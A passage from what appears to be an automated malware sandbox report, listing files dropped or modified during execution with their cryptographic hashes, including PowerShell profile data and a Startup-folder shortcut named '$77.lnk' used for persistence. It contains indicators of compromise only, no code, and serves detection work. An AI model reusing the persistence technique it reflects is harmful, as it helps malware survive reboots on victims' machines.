| SHA512 | 5fcbe58eea16e157f0d2595a2304e249cb7a3aab5516d58600ef828bb36766d5a149554fbe41ab0bc09df89da9be8538a490599ce02e23ff845053af78bebe4d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Microsoft.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a115771c01b1507a1846f0dc6687a492 |
| SHA1 | c6dd34f87bd8fe6c4af77e9fa02e7b1cf58bd41f |
| SHA256 | a3409692b7dfa70b0f083a5d73230eaaaf55c7c3e74ec5399c5b3f09e05219a5 |
| SHA512 | 1bc6d51f48aa4e4013378887aa9e0bb91b30e5618bae6c15c45526ba861971c749a0778291d3f5515bfd75626c573d0f3c0110501166e60df176af2fcc89698c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | bedb5025bf1eff6f585b07d364e6fdf3 |
| SHA1 | 14f8df0938b32838135a78f6160577f02475eef1 |
| SHA256 | 642b0c6cc8ab92c8e2769bed0859a8f80b242f0a7b5c1be7fd53424fd56c2d5b |
| SHA512 | 2111544b7f99f12b14547837ebb4f00ec968daa1153a5077de130c849aba63b53e8d23918690b944fec2958ca33a479f306dbac7b9b01b5c6a9c8a3903cccd4a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dd1d0b083fedf44b482a028fb70b96e8 |
| SHA1 | dc9c027937c9f6d52268a1504cbae42a39c8d36a |
| SHA256 | cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c |
| SHA512 | 96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | a2c8179aaa149c0b9791b73ce44c04d1 |
| SHA1 | 703361b0d43ec7f669304e7c0ffbbfdeb1e484ff |
| SHA256 | c1d30342a40a2b6e7553da30ceb85754d33820f6fbb3bbbed1ceb30d6390de4a |
| SHA512 | 2e201dd457d055baad86f68c15bcc7beb48d6dc2ffc10db7f304eb93f697e7b45991cbde857d25da2c9c60c23f3e13df8b5ed5809c1753737a23096e296cc9e3 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77.lnk
| MD5 | 7b9c5c3e28db7ebdd3fc80ea9c93be9e |
| SHA1 | bc06ac54e9f5dcb16702ff3c595ce253a5dbe450 |
| SHA256 | 24d2b087f342f2edfffbecedc430623dd78eaef083536448151d88a8a65f7366 |
| SHA512 | 70027ab7e28dfea808ac46e94a5b6b3cb00b0f0e06236d45e013db00dd8e779747a3d30b6bb7136077f8b04737b421459b4eaee5e1a608d457d076fcff8824f9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | afc6cddd7e64d81e52b729d09f227107 |
| SHA1 | ad0d3740f4b66de83db8862911c07dc91928d2f6 |
| SHA256 | b5e81a7c7d80feaaa10ee7bc8aaef9f21a5c1e4b03b3823ed115022311d674a0 |
| SHA512 | 844edb69585153c378a7c97709983776fc9303a32fb5ef8122ecca32adfc0b265f5ef7118ee07814da5c020ac7ba1bf2a2f66d46312e4d8e6df99aab2e5f9b2a |